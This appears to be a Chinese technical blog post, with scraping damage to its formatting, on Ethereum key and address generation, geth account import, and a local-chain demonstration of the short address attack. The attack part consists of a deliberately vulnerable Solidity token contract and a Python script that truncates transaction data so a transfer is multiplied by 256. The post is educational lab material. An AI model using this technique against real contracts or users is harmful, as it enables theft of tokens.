

  1. 生成 256 位随机数作为私钥
  2. 将私钥转化为 secp256k1 非压缩格式的公钥,即 512 位的公钥
  3. 使用散列算法 Keccak256 计算公钥的哈希值,转化为十六进制字符串
  4. 取十六进制字符串的后 40 个字母,开头加上 0x 作为地址 ```python import secp256k1 from Crypto.Hash import keccak

def get_eth_addr(private_key_str=None): if private_key_str is None: private_key = secp256k1.PrivateKey() private_key_str = private_key.serialize() else: private_key_bytes = bytes.fromhex(private_key_str)

  1. # 将私钥转化为secp256k1公钥
  2. private_key = secp256k1.PrivateKey(private_key_bytes)
  3. public_key_bytes = private_key.pubkey.serialize(compressed=False)
  4. public_key_str = public_key_bytes.hex()
  5. keccak_hash = keccak.new(digest_bits=256)
  6. keccak_hash.update(public_key_bytes[1:])
  7. h = keccak_hash.hexdigest()
  8. address = '0x' + h[-40:]
  9. return {
  10. "private_key": private_key_str,
  11. "public_key": public_key_str,
  12. "address": address
  13. }

if name == “main“: print(get_eth_addr(“6ead04ad16c381377a35972712b53cfe552694cea9be337bc97291930487c7f8”))

  1. ```bash
  2. apt install pkg-config
  3. pip install secp256k1
  4. pip install pycryptodome



在线网站生成指定地址: https://vanity-eth.tk/ ,可指定前缀和后缀爆破生成私钥。
50.png 点击Save可以直接生成json文件,将其下载复制到geth私链keystore即可添加该账户。也可通过geth导入私钥添加账户。


  1. 将私钥保存到pkey.txt文件中
  2. 导入将私钥导入geth:geth account import pkey.txt


  1. 找到私钥对应的keystore文件: geth account list


  1. 将该keystore文件移动到私链的keystore文件夹下,进入console查看是否添加成功53.png





    对于这样一个合约,Bob 想要转发 1 token 给 Alice 的账户,然而 Alice 给 Bob 的地址是省略了最后两位0,导致转账 token 翻了 256 倍。
    55.png ```javascript pragma solidity ^0.4.25;

contract short_address { mapping (address => uint) balances;

  1. event Transfer(address indexed _from, address indexed _to, uint256 _value);
  2. function short_address() public {
  3. balances[msg.sender] = 10000;
  4. }
  5. // 向地址转账
  6. function transfer(address to, uint amount) public returns(bool success) {
  7. if (balances[msg.sender] < amount) return false;
  8. balances[msg.sender] -= amount;
  9. balances[to] += amount;
  10. emit Transfer(msg.sender, to, amount);
  11. return true;
  12. }
  13. function getBalance(address addr) public view returns(uint) {
  14. return balances[addr];
  15. }


  1. 注意: ValueError: {'code': -32601, 'message': 'the method eth_accounts does not exist/is not available'}<br />玄学错误: --http.api "eth,web3" ==> --http.api eth,web3
  2. <a name="dnAmU"></a>
  3. #### 测试代码
  4. ```python
  5. import os,json,sys
  6. from web3 import Web3,HTTPProvider
  7. class contract:
  8. # 编译合约
  9. def __init__(self,file):
  10. os.system("solcjs "+file+" --bin --abi --optimize")
  11. for fi in os.listdir():
  12. if fi[-3:]=='abi':
  13. os.rename(fi,'tmp.abi')
  14. elif fi[-3:]=='bin':
  15. os.rename(fi,'tmp.bin')
  16. with open('tmp.bin','r') as f:
  17. self.contractBin = "0x"+(f.readlines())[0]
  18. with open('tmp.abi','r') as f:
  19. self.contractAbi = json.loads((f.readlines())[0])
  20. os.remove('tmp.abi')
  21. os.remove('tmp.bin')
  22. print('[!] 合约编译成功...')
  23. # 部署合约
  24. def deploy(self):
  25. self.web3 = Web3(HTTPProvider('http://localhost:60000'))
  26. if not self.web3.isConnected():
  27. exit("[!] 请检查是否开启RPC服务...")
  28. eth = self.web3.eth
  29. eth.default_account = eth.accounts[0]
  30. # 解锁账户
  31. self.web3.geth.personal.unlock_account(eth.accounts[0],'123')
  32. gasValue = eth.estimateGas({'data':self.contractBin})
  33. print("[!] 合约部署预计消耗gas: "+str(gasValue))
  34. tx_hash = eth.contract(
  35. abi=self.contractAbi,
  36. bytecode=self.contractBin).constructor().transact()
  37. receipt=eth.waitForTransactionReceipt(tx_hash)
  38. address = receipt['contractAddress']
  39. print("[!] 合约部署成功,地址: "+str(address))
  40. self.address = address
  41. # 模拟攻击场景
  42. def attack(self):
  43. short_address = self.web3.eth.contract(address=self.address, abi=self.contractAbi)
  44. print("-------------------Account status-----------------------------------")
  45. print("before\n\tBob({}): {} token".format(self.web3.eth.accounts[0],short_address.functions.getBalance(self.web3.eth.accounts[0]).call()))
  46. print("\tAlice({}): {} token".format(self.web3.eth.accounts[3],short_address.functions.getBalance(self.web3.eth.accounts[3]).call()))
  47. # 获取交易data序列
  48. transaction = short_address.functions.transfer(self.web3.eth.accounts[3],1).buildTransaction()
  49. transaction['data']=transaction['data'][:-4]+transaction['data'][-2:]
  50. print("\nBob 向 Alice 转账 1 token...\n")
  51. tx_hash= self.web3.eth.send_transaction(transaction)
  52. self.web3.eth.waitForTransactionReceipt(tx_hash)
  53. print("after")
  54. print("\tBob({}): {} token".format(self.web3.eth.accounts[0],short_address.functions.getBalance(self.web3.eth.accounts[0]).call()))
  55. print("\tAlice({}): {} token".format(self.web3.eth.accounts[3],short_address.functions.getBalance(self.web3.eth.accounts[3]).call()))
  56. if __name__ == "__main__":
  57. contract = contract(sys.argv[1])
  58. contract.deploy()
  59. contract.attack()

从交易详情可以看到,69 字节数据缺少了 1 字节,数据后默认补 2 位 0



